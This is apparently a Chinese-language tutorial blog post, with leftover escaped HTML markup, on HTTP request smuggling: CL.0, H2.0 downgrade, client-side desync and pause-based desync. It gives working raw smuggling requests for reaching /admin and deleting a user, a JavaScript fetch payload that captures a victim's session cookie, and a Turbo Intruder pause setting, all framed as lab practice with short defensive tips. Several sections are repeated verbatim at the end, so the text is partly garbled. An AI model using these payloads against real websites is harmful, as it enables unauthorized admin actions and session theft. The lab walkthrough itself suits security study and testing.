HTTP请求走私利用扩展(终结篇) - 深入解析与实战指南<\/h1>

文章前言<\/h2>
本文是HTTP请求走私系列的终结篇，将深入探讨几种特殊的请求走私技术，包括CL.0请求走私、H2.0走私和客户端去同步化攻击(CSD)，以及基于暂停的CSD攻击。这些技术扩展了传统请求走私的攻击面，即使在单服务器环境中也可能存在风险。<\/p>

CL.0请求走私<\/h2>

基本概念<\/h3>
CL.0请求走私是指后端服务器完全忽略Content-Length头，将其视为0的情况。当前端服务器仍然使用Content-Length头确定请求边界时，攻击者可以利用这种解析差异实施走私攻击。<\/p>

漏洞检测方法<\/h3>

发送包含走私前缀的POST请求：<\/p>

POST \/vulnerable-endpoint HTTP\/1.1
Host: vulnerable-website.com
Connection: keep-alive
Content-Length: 34

GET \/hopefully404 HTTP\/1.1
Foo: x
<\/code><\/pre>
<\/li>

发送正常后续请求<\/p>
<\/li>

观察响应：如果第二个请求返回404，则存在CL.0漏洞<\/p>
<\/li>
<\/ol>
靶场实战演示<\/h3>
目标<\/strong>：利用CL.0走私访问\/admin管理面板并删除用户carlos<\/p>


修改GET请求为POST，添加走私前缀：<\/p>
POST \/resources\/images\/blog.svg HTTP\/1.1
Host: target.com
Connection: keep-alive
Content-Length: 27

GET \/admin HTTP\/1.1
Foo: x
<\/code><\/pre>
<\/li>

构造删除用户请求：<\/p>
POST \/resources\/images\/blog.svg HTTP\/1.1
Host: target.com
Connection: keep-alive
Content-Length: 50

GET \/admin\/delete?username=carlos HTTP\/1.1
Foo: x
<\/code><\/pre>
<\/li>
<\/ol>
H2.0走私<\/h2>
H2.0走私是HTTP\/2降级攻击的变种，当后端服务器忽略降级后请求的Content-Length头时产生。攻击原理与CL.0类似，但发生在HTTP\/2降级为HTTP\/1.1的场景中。<\/p>
客户端去同步化攻击(CSD)<\/h2>
基本概念<\/h3>
CSD攻击使受害者的浏览器与易受攻击网站连接不同步，不同于传统请求走私的前端-后端不同步。攻击流程：<\/p>

受害者访问含恶意JavaScript的网页<\/li>
JavaScript发起包含恶意前缀的请求<\/li>
服务器响应后，恶意前缀保留在连接中<\/li>
JavaScript触发后续请求，附加到恶意前缀<\/li>
<\/ol>
靶场实战演示<\/h3>
目标<\/strong>：窃取受害者的会话cookie<\/p>


确认服务器忽略Content-Length：<\/p>
GET \/ HTTP\/1.1
Host: target.com
Content-Length:110
<\/code><\/pre>
<\/li>

构造CSD攻击向量：<\/p>
fetch<\/span>('https:\/\/target.com'<\/span>, {
<\/span><\/span>  method<\/span>:<\/span> 'POST'<\/span>,
<\/span><\/span>  body<\/span>:<\/span> 'POST \/en\/post\/comment HTTP\/1.1\r\nHost: target.com\r\nCookie: [受害者的cookie]\r\nContent-Length: 300\r\n...'<\/span>,
<\/span><\/span>  mode<\/span>:<\/span> 'cors'<\/span>,
<\/span><\/span>  credentials<\/span>:<\/span> 'include'<\/span>,
<\/span><\/span>}).catch<\/span>(() => {
<\/span><\/span>  fetch<\/span>('https:\/\/target.com\/capture-me'<\/span>, {
<\/span><\/span>    mode<\/span>:<\/span> 'no-cors'<\/span>,
<\/span><\/span>    credentials<\/span>:<\/span> 'include'<\/span>
<\/span><\/span>  })
<\/span><\/span>})
<\/span><\/span><\/code><\/pre><\/li>

调整Content-Length捕获完整cookie<\/p>
<\/li>
<\/ol>
基于暂停的CSD攻击<\/h2>
基本原理<\/h3>
当服务器配置读取超时但保持连接开放时，攻击者可以通过暂停请求传输来制造解析差异：<\/p>

前端立即转发每个字节到后端<\/li>
前端不先于后端超时<\/li>
后端超时后保持连接开放<\/li>
<\/ol>
靶场实战演示<\/h3>
目标<\/strong>：利用暂停技术访问\/admin删除用户<\/p>


构造暂停攻击请求：<\/p>
POST \/resources HTTP\/1.1
Host: target.com
Connection: keep-alive
Content-Length: 159

POST \/admin\/delete\/ HTTP\/1.1
Host: localhost
Content-Length: 53

csrf=xxx&username=carlos
<\/code><\/pre>
<\/li>

使用Turbo Intruder设置pauseMarker参数：<\/p>
pauseMarker=<\/span>['Content-Length: CORRECT<\/span>\r\n\r\n<\/span>'<\/span>]
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
防御建议<\/h2>

禁用连接重用<\/li>
前后端使用相同HTTP协议版本<\/li>
严格验证Content-Length和Transfer-Encoding头<\/li>
配置合理的超时时间<\/li>
实施Web应用防火墙规则检测异常请求<\/li>
<\/ol>
总结<\/h2>
本文扩展了请求走私的攻击技术面，展示了即使在看似安全的单服务器环境中也可能存在的风险。安全团队应全面测试系统对各种请求走私变种的防护能力，特别是协议降级和客户端攻击场景。<\/p>

HTTP请求走私利用扩展(终结篇) - 深入解析与实战指南<\/h1>

CL.0请求走私<\/h2>

基本概念<\/h3> CL.0请求走私是指后端服务器完全忽略Content-Length头，将其视为0的情况。当前端服务器仍然使用Content-Length头确定请求边界时，攻击者可以利用这种解析差异实施走私攻击。<\/p>

H2.0走私<\/h2> H2.0走私是HTTP\/2降级攻击的变种，当后端服务器忽略降级后请求的Content-Length头时产生。攻击原理与CL.0类似，但发生在HTTP\/2降级为HTTP\/1.1的场景中。<\/p>

客户端去同步化攻击(CSD)<\/h2>

基于暂停的CSD攻击<\/h2>

总结<\/h2> 本文扩展了请求走私的攻击技术面，展示了即使在看似安全的单服务器环境中也可能存在的风险。安全团队应全面测试系统对各种请求走私变种的防护能力，特别是协议降级和客户端攻击场景。<\/p>

基本概念<\/h3>
CL.0请求走私是指后端服务器完全忽略Content-Length头，将其视为0的情况。当前端服务器仍然使用Content-Length头确定请求边界时，攻击者可以利用这种解析差异实施走私攻击。<\/p>

H2.0走私<\/h2>
H2.0走私是HTTP\/2降级攻击的变种，当后端服务器忽略降级后请求的Content-Length头时产生。攻击原理与CL.0类似，但发生在HTTP\/2降级为HTTP\/1.1的场景中。<\/p>

总结<\/h2>
本文扩展了请求走私的攻击技术面，展示了即使在看似安全的单服务器环境中也可能存在的风险。安全团队应全面测试系统对各种请求走私变种的防护能力，特别是协议降级和客户端攻击场景。<\/p>